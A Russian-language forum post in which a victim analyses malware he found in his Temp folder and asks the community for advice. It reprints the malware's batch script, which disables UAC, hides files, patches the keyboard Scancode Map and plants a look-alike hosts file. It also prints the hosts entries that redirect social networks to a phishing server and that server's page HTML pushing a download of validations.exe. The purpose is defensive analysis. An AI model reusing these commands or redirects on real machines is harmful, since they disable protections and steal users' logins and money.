Кража паролей, подозрительные файлы в /temp

**RZS** · 19.02.2012, 10:33

Обнаружил у себя в общей свалке /TEMP небольшой зверинец.
Для начала посмотрел msconfig. В автозагрузке обнаружилась фейковая строка "Операционная система Microsoft Windows", вызывающая cmd.exe и отправляющая в него команды.

По командам видно, что запускается bat скрипт и выполняются некоторые манипуляции с файлом hosts.

Тело bat скрипта:

Код:

Reg Add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /V Hidden /T REG_DWORD /D 0 /F
::5qd888oj2gpaaskyozjsvl28icrht3qe5tchj4cag5li¬A@
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 000000000000000003000000000037e00000540000000000 /f
erase "C:\Users\EXL\AppData\Local\Temp.810868802526864467f76.exe"
::5qd888oj2gpaaskyozjsvl28icrht3qe5tchj4cag5li¬A@
erase /Q "C:\Users\EXL\AppData\Local\Temp\znddv.vbs"
chcp 1251
copy "C:\Users\EXL\AppData\Local\Temp\p83j9" "C:\WINDOWS\system32\drivers\etc\hоsts" /Y

Из которого видно, что для начала отключается показ скрытых файлов, потом выполнение скриптов LUA???, затем скорее всего реестр патчится кейлогером/кейсканером. После этого стирается какой-то экзешник и VBS скрипт znddv.vbs. Потом меняется кодировка, и в файл drivers\etc записывается фейковый файл hоsts с написанием имени через русскую (кириллическую) букву "о".

Т.е получается на деле вот что:

Настоящий hosts переименовывается и скрывается, а на его место ставится фейковый, объёмом в 273 кб. Тело этого инфицированного файла тоже интересно. Хакер пытается сбить юзера с толку наставив в нём лишних пробелов и сдвинув коварные строчки далеко за поле зрения.

В инфицированном hosts - имеются следующие записи:

Код:

95.156.222.12 odnoklassniki.ru
95.156.222.12 www.facebook.com
95.156.222.12 www.twitter.com
95.156.222.12 vkontakte.ru
95.156.222.12 ru-ru.facebook.com
95.156.222.12 www.odnoklassniki.ru
95.156.222.12 vk.com
95.156.222.12 www.vkontakte.ru
95.156.222.12 www.vk.com
95.156.222.12 facebook.com
95.156.222.12 twitter.com

Если просто перейти по IP-адресу получаем отлуп 400 Bad Request.

При заходе на данный IP адрес сервером распознаются какие-то команды и выдаётся фейковая страничка, точь в точь похожая на оригинальную официального ресурса.

Вводя пароль и логин на данных фейковых сайтах вы отправляете их злоумышленикам.

Кроме того хакерами была придумана интересная схема получения средств с незадачливых пользователей. Например рассмотрим фейковую форму ресурса 95.156.222.12 twitter.com.

После ввода ваших данных (логин/пароль) вылазит окошко с информацией следующего вида:

Номер Вашего телефона нужен для того, чтобы мы смогли прислать Вам код подтверждения и убедиться в том, что Вы - реальная личность!

"Twitter" гарантируют, что информация о Вашем номере ни при каких обстоятельствах не будет разглашена или передана третьим лицам. Данная мера принята для того, чтобы оградить пользователей от автоматических спам-ботов.

Имея доступ к указанному номеру, Вы всегда сможете восстановить пароль к Вашей странице.

Услуга недоступна абонентам некоторым регионам Мегафона.

После ввода телефонного номера появляется

На Ваш номер +79XXXXXXXXX был отправлен запрос валидации. В ответном СМС отправьте Ваш уникальный код: 13927

А на телефон приходит смс-ка такого содержания:

Естественно неопытные пользователи легко попадаются.

Я немного посмотрел код исходной страницы

Код:

Имея доступ к указанному номеру, Вы всегда сможете <b>восстановить пароль</b> к Вашей странице.
                                     <br /><br />Услуга недоступна абонентам некоторым регионам Мегафона.
                                </div>
                                <div id="poup_progress">
                                    <div class="poup_progress_bar">
                                        <p id="t"></p>
                                    </div>
                                </div>
                                <div id="popup_info_2">
                                    Ваша заявка принята!
                                </div>
                                <div id="popup_info_3">

                                </div>
                                <div id="popup_info_4">
Валидация успешно завершена!<br />
Для вступления изменений в силу <a href="/validations.exe">скачайте и запустите этот файл</a>.
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="box_controls_wrap">
                        <div class="box_controls">

после отправки СМС-ки пользователю советует запустить некий validations.exe, размером 11 кбайт. Мне стало немного интересно и я запустил данный файл в виртуальной машине, хотя антивирус ругался что он закриптован. При запуске вылезло:

Валидация прошла успешно, перезагрузите компьютер

. После перезагрузки файл validations.exe удалился, а hosts очистился от коварных строк и стал весить 0byte.

Результат сканирования исполнительного файла из архива:
https://www.virustotal.com/file/9360fa85e42...sis/1329627824/

В общем у меня вопросы к комьюнити.
Снифятся ли пароли или буфер обмена этим зверинцем? Что именно делает строка

Код:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 000000000000000003000000000037e00000540000000000 /f

и за что отвечают строки вида

Код:

::5qd888oj2gpaaskyozjsvl28icrht3qe5tchj4cag5li¬A@

в bat скрипте?
Как именно попадают такие вирусы в компьютер? Через javascript в браузерах?
Я грохнул все исполнительные файлы вируса и подозрительные ветки реестра, но до сих пор не уверен в своей защите. Что вы можете мне посоветовать?

Спасибо за внимание.

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru: